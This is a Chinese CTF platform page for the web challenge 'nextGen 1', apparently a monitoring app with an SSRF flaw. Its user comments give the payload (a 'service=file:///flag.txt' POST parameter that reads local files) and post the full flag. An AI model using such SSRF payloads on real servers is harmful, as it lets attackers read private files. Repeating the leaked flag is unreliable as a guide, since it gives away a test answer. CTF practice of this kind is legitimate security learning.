nextGen 1WEB 未解决

分数: 0 金币: 0
题目作者: 未知
一  血: L010
一血奖励: 0金币
解  决: 487
提  示: Flag is in the `/flag.txt` file of the web server
描  述:
> Simple monitoring app.
...
登录回复
评论
xiaoxiao972521 1月前
举报

service=file:////flag.txt

回复 0
15614005380 2月前
举报

属于典型的SSRF漏洞,利用file协议读取flag

回复 0
meilanzhuju 3月前
举报

服务器到底是怎么处理这个service的?是展示这个service指向的url的内容?

回复 0
luskan 3月前
举报

源码最下方看js代码,按照代码内容构建请求,利用service参数夹带私货。

回复 0
868954104 4月前
举报

shellmates{1T_W4S_4_qu1T3_3s4y_expl01tabL3_$$Rf} service=file://127.0.0.1/flag.txt

回复 0
vchopin 5月前
举报

file:///flag.txt

回复 0
zhaiye 6月前
举报

File协议主要用于访问本地计算机中的文件,就如同在Windows资源管理器中打开文件一样。 2、格式:file://机器的IP地址/目录/文件,例如要打开D盘images文件夹中的111.png文件,那么可以在资源管理器或IE地址栏中键入file://D:/images/111.png 然后回车。 注:(1)对于本地机器,机器的IP地址可变成127.0.0.1或loca

回复 0
2728462336 6月前
举报

SSRF,通过数据包访问/request,在POST传参service最后利用file协议读取flag

回复 0
yituoshi 6月前
举报

Half the truth is often a big lie: shellmates{1T_W4S_4_qu1T3_3s4y_expl01tabL3_$$

回复 0
test147258 6月前
举报

题坏了

回复 0

WriteUp

image
hopeinhand

1 金币

立即查看

评分(3)

解题动态

tartaglia 攻破了该题 12小时前
18894292492 攻破了该题 1天前
菜鸡的小韩 攻破了该题 1天前
pb9231 攻破了该题 2天前
huanying1247 攻破了该题 3天前
to5ny 攻破了该题 3天前
aaaabcc 攻破了该题 4天前
Panda82 攻破了该题 4天前
all_in 攻破了该题 4天前
15267151599 攻破了该题 4天前
WCRH 攻破了该题 5天前
jquery 攻破了该题 6天前
18794764849 攻破了该题 6天前
WYEJOJO 攻破了该题 6天前
星光闪烁 攻破了该题 6天前
flagOrz 攻破了该题 7天前
wobushicxk 攻破了该题 7天前
qwerfsafafa 攻破了该题 8天前
junzijie 攻破了该题 9天前
skyorangezxc 攻破了该题 9天前